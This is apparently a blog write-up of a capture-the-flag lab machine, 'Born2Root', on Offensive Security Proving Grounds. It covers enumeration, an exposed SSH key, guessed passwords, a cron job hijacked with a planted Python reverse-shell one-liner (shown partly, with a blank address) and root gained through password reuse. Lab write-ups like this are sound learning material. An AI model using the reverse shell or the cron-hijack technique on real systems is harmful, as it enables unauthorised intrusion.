BORN2ROOT — Offensive Security

Neelesh Patel
3 min readOct 27, 2021


Offensive Security Proving Ground Complete Write-up

Exporting IP of the target machine as environment variable and scanned the target and found open ports and services as:

After switching up to port 80, three users found as martin, hadi, jimmy. COOL!!

After busting the directories with wfuzz, the results are

After hoping to icons directories and enumerating all the files , there’s was a file having ssh key

AWESOME!!, so we got three users, after trying with martin with password secret lab, it was a successful login

Enumerating the martin’s machine and found that in crontab,the file is running every five minutes which itself is missing in /tmp

So i created the same file name with reverse shell payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",0000));

with my knife listening on my root machine and yes, it was a good to go!

Enumerating the machine and found nothing special and only user left is hadi, so tried with hadi and with normal password of hadi123 and guess it worked!!!!

Enumerating the machine and after switching user with su command i tried with same password and was a successful login,

Clearly we are now root!!!

That’s all for now!!

Until Next Time,

Stay COOL!!!!

For any query, catch me on:



Neelesh Patel

All I need is just my ten fingers and sometimes {coffee}, to talk to computers.